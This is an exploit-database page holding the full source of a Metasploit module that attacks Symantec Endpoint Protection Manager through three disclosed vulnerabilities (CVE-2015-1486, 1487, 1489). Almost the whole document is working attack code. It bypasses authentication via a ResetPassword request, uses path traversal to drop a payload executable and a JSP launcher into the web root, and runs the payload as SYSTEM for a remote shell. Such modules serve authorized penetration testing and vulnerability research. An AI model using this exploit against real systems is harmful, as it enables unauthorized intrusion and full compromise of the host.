Symantec Endpoint Protection Manager - Authentication Bypass / Code Execution (Metasploit)





Platform:

Windows_x86

Date:

2015-08-18


##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FileDropper
  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Symantec Endpoint Protection Manager Authentication Bypass and Code Execution',
      'Description'    => %q{
        This module exploits three separate vulnerabilities in Symantec Endpoint Protection Manager
        in order to achieve a remote shell on the box as NT AUTHORITY\SYSTEM. The vulnerabilities
        include an authentication bypass, a directory traversal and a privilege escalation to
        get privileged code execution.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Markus Wulftange', #discovery
          'bperry' # metasploit module
        ],
      'References'     =>
        [
          ['CVE', '2015-1486'],
          ['CVE', '2015-1487'],
          ['CVE', '2015-1489'],
          ['URL', 'http://codewhitesec.blogspot.com/2015/07/symantec-endpoint-protection.html']
        ],
      'DefaultOptions' => {
        'SSL' => true
      },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic',
            {
              'Arch' => ARCH_X86,
              'Payload' => {
                'DisableNops' => true
              }
            }
          ],
        ],
      'Privileged'     => true,
      'DisclosureDate' => 'Jul 31 2015',
      'DefaultTarget'  => 0))

      register_options(
        [
          Opt::RPORT(8443),
          OptString.new('TARGETURI', [true, 'The path of the web application', '/']),
        ], self.class)
  end

  def exploit
    meterp = Rex::Text.rand_text_alpha(10)
    jsp = Rex::Text.rand_text_alpha(10)

    print_status("#{peer} - Getting cookie...")

    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
      'method' => 'POST',
      'vars_post' => {
        'ActionType' => 'ResetPassword',
        'UserID' => 'admin',
        'Domain' => ''
      }
    })

    unless res && res.code == 200
      fail_with(Failure::Unknown, "#{peer} - The server did not respond in an expected way")
    end

    cookie = res.get_cookies

    if cookie.nil? || cookie.empty?
      fail_with(Failure::Unknown, "#{peer} - The server did not return a cookie")
    end

    exec = %Q{<%@page import="java.io.*,java.util.*,com.sygate.scm.server.util.*"%>
<%=SemLaunchService.getInstance().execute("CommonCMD", Arrays.asList("/c", System.getProperty("user.dir")+"\\\\..\\\\webapps\\\\ROOT\\\\#{meterp}.exe")) %>
    }

    print_status("#{peer} - Uploading payload...")
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
      'method' => 'POST',
      'vars_get' => {
        'ActionType' => 'BinaryFile',
        'Action' => 'UploadPackage',
        'PackageFile' => "../../../tomcat/webapps/ROOT/#{meterp}.exe",
        'KnownHosts' => '.'
      },
      'data' => payload.encoded_exe,
      'cookie' => cookie,
      'ctype' => ''
    })

    unless res && res.code == 200
      fail_with(Failure::Unknown, "#{peer} - Server did not respond in an expected way")
    end

    register_file_for_cleanup("../tomcat/webapps/ROOT/#{meterp}.exe")

    print_status("#{peer} - Uploading JSP page to execute the payload...")
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
      'method' => 'POST',
      'vars_get' => {
        'ActionType' => 'BinaryFile',
        'Action' => 'UploadPackage',
        'PackageFile' => "../../../tomcat/webapps/ROOT/#{jsp}.jsp",
        'KnownHosts' => '.'
      },
      'data' => exec,
      'cookie' => cookie,
      'ctype' => ''
    })

    unless res && res.code == 200
      fail_with(Failure::Unknown, "#{peer} - Server did not respond in an expected way")
    end

    register_file_for_cleanup("../tomcat/webapps/ROOT/#{jsp}.jsp")

    print_status("#{peer} - Executing payload. Manual cleanup will be required.")
    send_request_cgi({
      'uri' => normalize_uri(target_uri.path, "#{jsp}.jsp")
    }, 5)
  end
end